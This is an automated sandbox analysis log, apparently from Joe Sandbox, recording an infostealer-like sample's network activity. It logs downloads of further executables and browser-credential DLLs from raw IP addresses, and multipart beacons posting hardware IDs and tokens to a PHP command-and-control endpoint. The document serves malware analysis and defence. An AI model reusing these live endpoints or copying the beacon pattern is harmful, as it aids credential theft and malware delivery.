0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 68 65 72 37 68 34 38 72 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 44 2d 2d 0d 0a Data Ascii: ------GIIIECBGDHJJKFIDAKJDContent-Disposition: form-data; name="token"8f576ccbd010d5db7d1a32561c9f16c6d4dbb39fbe09bc63c5c878de6304643d64e61fb8------GIIIECBGDHJJKFIDAKJDContent-Disposition: form-data; name="message"her7h48r------GIIIECBGDHJJKFIDAKJD--
                              Source: global trafficHTTP traffic detected: GET /tiktok.exe HTTP/1.1Host: 185.172.128.203Cache-Control: no-cache
                              Source: Joe Sandbox ViewIP Address: 185.172.128.90 185.172.128.90
                              Source: Joe Sandbox ViewIP Address: 185.172.128.228 185.172.128.228
                              Source: Joe Sandbox ViewASN Name: NADYMSS-ASRU NADYMSS-ASRU
                              Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                              Source: global trafficHTTP traffic detected: GET /cpa/ping.php?substr=two&s=ab&sub=0 HTTP/1.1Host: 185.172.128.90User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                              Source: global trafficHTTP traffic detected: GET /ping.php?substr=two HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                              Source: global trafficHTTP traffic detected: GET /ping.php?substr=two HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                              Source: global trafficHTTP traffic detected: GET /syncUpd.exe HTTP/1.1Host: 185.172.128.59User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                              Source: global trafficHTTP traffic detected: GET /1/Package.zip HTTP/1.1Host: note.padd.cn.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                              Source: global trafficHTTP traffic detected: GET /BroomSetup.exe HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                              Source: global trafficHTTP traffic detected: POST /__svc/sbv/DownloadManager.ashx HTTP/1.0Connection: keep-aliveContent-Length: 300Host: svc.iolo.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: identityUser-Agent: Mozilla/3.0 (compatible; Indy Library)
                              Source: global trafficHTTP traffic detected: POST /__svc/sbv/DownloadManager.ashx HTTP/1.0Connection: keep-aliveContent-Length: 300Host: svc.iolo.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: identityUser-Agent: Mozilla/3.0 (compatible; Indy Library)
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.228
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.228
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.228
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.228
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.228
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_0042676C __EH_prolog,WSAStartup,socket,WSACleanup,gethostbyname,htons,connect,send,send,recv,recv,recv,recv,recv,WSACleanup,closesocket,0_2_0042676C
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 26 Apr 2024 23:15:55 GMTContent-Type: application/zipContent-Length: 3884863Last-Modified: Wed, 24 Apr 2024 05:45:46 GMTConnection: keep-aliveETag: "66289c8a-3b473f"Strict-Transport-Security: max-age=31536000Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 0b 3f 98 58 ef da 8c 80 dd c7 12 00 09 49 14 00 09 00 00 00 62 75 6e 63 68 2e 64 61 74 5c 5d 87 a2 aa 3a 16 cd af 89 8a 20 22 2a 16 10 05 54 ec 15 1b fa f7 b3 d6 4e 3c 77 66 bc ef 58 20 24 3b bb 65 b7 e4 29 a5 ac 9e af 7c 75 5d 2b bc a6 ca 55 2a 56 ea a9 7e af 81 db 9b bd d4 66 da 52 6a 65 f7 f5 b5 1d fe 1a b5 40 f5 66 f8 72 c0 df 56 0d 95 da 17 4a 2d f0 23 55 bd e7 b3 b7 bc 2a b5 de ab 3d ba 54 13 f5 45 13 35 cc 94 5a fa e3 83 aa 26 b5 9e 7a cf 95 fa f4 27 18 6b a2 8e 25 9e cb 4a 65 a9 cb 85 03 dc d4 5b 35 1e e8 cd c6 8f f7 50 c5 db 85 42 7f b5 19 40 05 ac f3 07 2e bf d4 e9 96 a8 47 eb fc 7a 5b 2a 8f 2d 42 31 e2 c3 ce d0 4a 7a 23 0c a9 ce d7 25 de bb 4a b1 fb a6 6a 06 0f d5 57 f5 a4 0e 18 af b5 00 1d 3e 36 32 eb 6a 4b 28 95 bc 0d d4 f1 a3 1a a1 9a c4 a5 02 84 45 b4 54 c9 51 7d d6 6a dd 5f 49 8b 8e 52 ee 54 45 6a a3 3e d2 f1 8b 4f c6 2a 99 3a 4a 25 6f a5 da aa 18 02 8b ec aa a6 b2 60 82 66 2b 4f a9 d6 1c 57 3e 15 87 c0 a3 dd 53 8e 49 4e 43 f5 6d ab 36 be a9 7c 77 51 bb 78 6b ba 4b fa eb fb e5 c8 6f bd 44 1d da 82 f4 13 3a ec 6e 34 01 be 0b f5 50 3e be 84 2a 4d 86 5f 7c 1b a9 8d 50 a7 52 40 9d 67 57 00 90 af 6b 98 90 58 dd c1 01 4d 62 4d d5 0b 9a 17 00 48 0d e6 07 f5 11 e0 eb 20 0c be a0 97 c5 23 6f 05 43 43 fb 21 da b5 c6 fd 31 21 52 f5 67 a2 f2 0a f8 51 63 20 22 50 0d 95 ab c2 51 87 33 a0 48 d0 42 f3 46 e7 7c 1d c6 aa 91 29 97 e0 bd ea cf c6 f8 a9 ae 13 dc f0 40 81 bf 57 f3 a8 36 9f a1 5a 03 15 37 90 39 e0 b5 ed a2 af b6 fc ea 91 64 27 60 5f bf 36 c0 7a 72 25 61 c7 c3 b6 85 1b 00 2a 1e 37 00 2c 2e 92 dd 6c 0c e4 a8 8e a3 2e 68 cb 76 9f f4 18 a0 8b e3 50 0d 4f 05 66 e1 8d 15 21 f4 fd 59 b7 f3 23 b3 b0 59 81 37 cd c2 67 d5 d8 b9 76 3d c4 f0 6b 7f a3 00 f0 4a d5 f9 d4 4e 23 5c a5 35 cc 93 d7 c1 d2 c2 a3 5d cc a7 ca f8 ad 1f b6 3c cf 56 47 55 00 7e 99 cb 9d a8 c7 2c bd d1 58 1e 6f 9b 6b 2e 80 23 8f ce 3f 76 a1 16 25 88 30 ac 2b f2 f9 8d 6d d8 28 6d c5 9e ea 61 68 be 4a 47 3e 16 00 83 fd d8 6d f7 d1 56 99 9a 0c dd f7 d3 6b 62 c0 f3 9a f3 42 ab 6a 58 a1 17 bc 56 24 70 92 a9 93 20 ce 95 c7 3f 9b 3c d8 aa f7 16 bd 5e cf 1d cc 25 4b 41 3d 30 5c be 28 ba c3 09 a6 f8 b8 51 ac 6c 3e 8c 3b 78 ad db 23 57 d5 96 40 40 1b 74 49 55 20 1d a6 f3 51 1b a0 8c 08 9a a5 16 97 14 c2 c0 d9 90 19 2f 65 c9 99 37 45 77 c4 95 f5 7d 68 dc e2 5e 4e e2 02 c5 20 89 9e 18 bb c2 8f 91 f9 de 2b 95 e6 fb 0e c8 b2 c7 0f 8d a9 62 52 7a ca ea f7 1a e3 8b 0a 81 9a 86 32 72 a5 66 1e de 84 75 27 6f bc f1 73 1c 7d 31 05 f4 b8 6a c5 7b 10 27 25 b5 c0 19 b5 85 1a b6 3f ce 81 8d 5a 03 fc 4d d5 00 d3 d4 ca ae 39 2e 7c 50 be dd 57 a3 6f a9 d6 f9 63 a0 92 d1 9b 33 c0 00 ed 15 48 5c 87 34 95 a2 42 8a c6 a3 c0 dc df df 3b 31 34 d1 a2 36 35 93 51 33 00 85 b9 f7 32 34 24 8b ec
                              Source: global trafficHTTP traffic detected: GET /cpa/ping.php?substr=two&s=ab&sub=0 HTTP/1.1Host: 185.172.128.90User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                              Source: global trafficHTTP traffic detected: GET /ping.php?substr=two HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                              Source: global trafficHTTP traffic detected: GET /ping.php?substr=two HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                              Source: global trafficHTTP traffic detected: GET /syncUpd.exe HTTP/1.1Host: 185.172.128.59User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                              Source: global trafficHTTP traffic detected: GET /1/Package.zip HTTP/1.1Host: note.padd.cn.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                              Source: global trafficHTTP traffic detected: GET /15f649199f40275b/sqlite3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /BroomSetup.exe HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                              Source: global trafficHTTP traffic detected: GET /15f649199f40275b/freebl3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /15f649199f40275b/mozglue.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /15f649199f40275b/msvcp140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /15f649199f40275b/nss3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /15f649199f40275b/softokn3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /15f649199f40275b/vcruntime140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /tiktok.exe HTTP/1.1Host: 185.172.128.203Cache-Control: no-cache
                              Source: global trafficDNS traffic detected: DNS query: note.padd.cn.com
                              Source: global trafficDNS traffic detected: DNS query: svc.iolo.com
                              Source: global trafficDNS traffic detected: DNS query: download.iolo.net
                              Source: global trafficDNS traffic detected: DNS query: westus2-2.in.applicationinsights.azure.com
                              Source: unknownHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIIJJJDGCBAAKFIIECGHost: 185.172.128.76Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 49 4a 4a 4a 44 47 43 42 41 41 4b 46 49 49 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 41 38 32 37 45 45 43 34 32 44 33 32 30 38 39 32 35 37 30 30 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 49 4a 4a 4a 44 47 43 42 41 41 4b 46 49 49 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 49 4a 4a 4a 44 47 43 42 41 41 4b 46 49 49 45 43 47 2d 2d 0d 0a Data Ascii: ------KFIIJJJDGCBAAKFIIECGContent-Disposition: form-data; name="hwid"BA827EEC42D32089257003------KFIIJJJDGCBAAKFIIECGContent-Disposition: form-data; name="build"default10------KFIIJJJDGCBAAKFIIECG--
                              Source: u5qk.0.exe, 00000001.00000002.2493025545.00000000040A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.203/tiktok.exe
                              Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: http://185.172.128.203/tiktok.exe00
                              Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: http://185.172.128.203/tiktok.exet-Disposition:
                              Source: u5qk.0.exe, 00000001.00000002.2492933650.0000000004054000.00000040.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76
                              Source: u5qk.0.exe, 00000001.00000002.2493025545.00000000040C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/freebl3.dll
                              Source: u5qk.0.exe, 00000001.00000002.2493025545.00000000040C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/freebl3.dll5
                              Source: u5qk.0.exe, 00000001.00000002.2493025545.00000000040C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/mozglue.dll
                              Source: u5qk.0.exe, 00000001.00000002.2493025545.00000000040C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/msvcp140.dll
                              Source: u5qk.0.exe, 00000001.00000002.2493025545.000000000406A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/nss3.dll
                              Source: u5qk.0.exe, 00000001.00000002.2493025545.000000000406A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/nss3.dll%
                              Source: u5qk.0.exe, 00000001.00000002.2493025545.000000000406A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/nss3.dll2
                              Source: u5qk.0.exe, 00000001.00000002.2493025545.00000000040C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/nss3.dllg
                              Source: u5qk.0.exe, 00000001.00000002.2493025545.00000000040C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/softokn3.dll
                              Source: u5qk.0.exe, 00000001.00000002.2493025545.00000000040C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/softokn3.dllS
                              Source: u5qk.0.exe, 00000001.00000002.2493025545.00000000040C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/sqlite3.dll
                              Source: u5qk.0.exe, 00000001.00000002.2493025545.00000000040A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/vcruntime140.dll
                              Source: u5qk.0.exe, 00000001.00000002.2493025545.00000000040A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/vcruntime140.dll#
                              Source: u5qk.0.exe, 00000001.00000002.2493025545.000000000406A000.00000004.00000020.00020000.00000000.sdmp, u5qk.0.exe, 00000001.00000003.1937375231.0000000004119000.00000004.00000020.00020000.00000000.sdmp, u5qk.0.exe, 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.php
                              Source: u5qk.0.exe, 00000001.00000002.2493025545.000000000406A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.php6X
                              Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.php9bc63c5c878de6304643d64e61fb8releaseccbd010d5db7d1a32561c9
                              Source: u5qk.0.exe, 00000001.00000002.2493025545.00000000040C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpt
                              Source: u5qk.0.exe, 00000001.00000002.2492933650.0000000004054000.00000040.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76Z
                              Source: run.exe, 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                              Source: run.exe, 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
                              Source: run.exe, 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3030420251.0000020EEB7A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3032814487.0000020EEB850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3045117994.0000020EEC0C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024035894.0000020EEB370000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E9007E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3030420251.0000020EEB7A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
                              Source: VucRf0jboS.exe, 00000000.00000003.2187851077.00000000075EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
                              Source: VucRf0jboS.exe, 00000000.00000003.2187851077.00000000075EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
                              Source: run.exe, 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3032814487.0000020EEB850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3045117994.0000020EEC0C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024035894.0000020EEB370000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E9007E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3030420251.0000020EEB7A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3032814487.0000020EEB850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3045117994.0000020EEC0C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024035894.0000020EEB370000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E9007E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3030420251.0000020EEB7A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3032814487.0000020EEB850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3045117994.0000020EEC0C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024035894.0000020EEB370000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E9007E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3030420251.0000020EEB7A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: http://compositewpf.codeplex.com/
